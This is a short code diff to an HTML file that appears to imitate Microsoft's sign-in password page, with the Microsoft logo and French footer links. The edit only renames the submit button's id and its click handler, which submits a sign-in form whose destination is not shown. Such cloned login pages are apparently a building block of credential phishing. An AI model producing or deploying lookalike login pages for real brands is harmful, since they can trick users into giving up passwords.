--- a/microsoft-login/index2.html
+++ b/microsoft-login/index2.html
@@ -7,7 +7,7 @@
 	<link href="assets/app.css" rel="stylesheet" />
 </head>
 <body>
-<section id="section_pwd" >
+    <section id="section_pwd">
         <div class="auth-wrapper">
             <img src="assets/logo.png" alt="Microsoft" class="d-block" />
             <div class="identity w-100 mt-16 mb-16">
@@ -30,14 +30,14 @@
                 </p>
             </div>
             <div>
-                <button class="btn" id="btn_sig" type="submit">Sign in</button>
+                <button class="btn" id="btn_next" type="submit">Sign in</button>
             </div>
         </div>
     </section>
 
 <footer class="footer"><a href="#">Conditions d'utilisation</a> <a href="#">Confidentialité et cookies</a> <span>. . .</span></footer>
 <!-- Script JavaScript pour gérer le clic sur le bouton "Next" --><script>
-        document.getElementById('btn_sig').addEventListener('click', function() {
+        document.getElementById('btn_next').addEventListener('click', function() {
             document.getElementById('signin_form').submit(); // Soumet le formulaire
         });
     </script></body>
